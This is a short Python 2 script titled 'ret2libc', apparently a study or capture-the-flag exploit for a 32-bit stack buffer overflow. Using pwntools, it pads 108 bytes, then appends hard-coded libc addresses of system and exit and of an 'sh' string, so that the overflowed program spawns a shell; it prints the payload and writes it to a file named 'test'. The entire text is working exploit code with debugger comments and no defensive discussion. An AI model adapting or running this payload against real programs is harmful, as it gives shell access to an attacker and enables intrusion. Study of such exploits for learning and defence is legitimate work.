ret2libc

1. #!/usr/bin/python
2. from pwn import *
3.  
4. def main():
5.         offset = 108
6.  
7.         # $2 = {<text variable, no debug info>} 0xf7e51940 <system>
8.         system_addr = p32(0xf7e51940)
9.  
10.         # $3 = {<text variable, no debug info>} 0xf7e457b0 <exit>
11.         exit_addr = p32(0xf7e457b0)
12.  
13.         # libc : 0xf7e29412 --> 0x69006873 ('sh')
14.         sh_str = p32(0xf7e29412)
15.  
16.         payload = "A" * offset
17.         payload += system_addr
18.         payload += exit_addr
19.         payload += sh_str
20.  
21.         print payload
22.  
23.         # For debug
24.         fname = 'test'
25.         with open(fname, 'w') as dbg:
26.                 dbg.write(payload)
27.  
28. if __name__ == "__main__":
29.         main()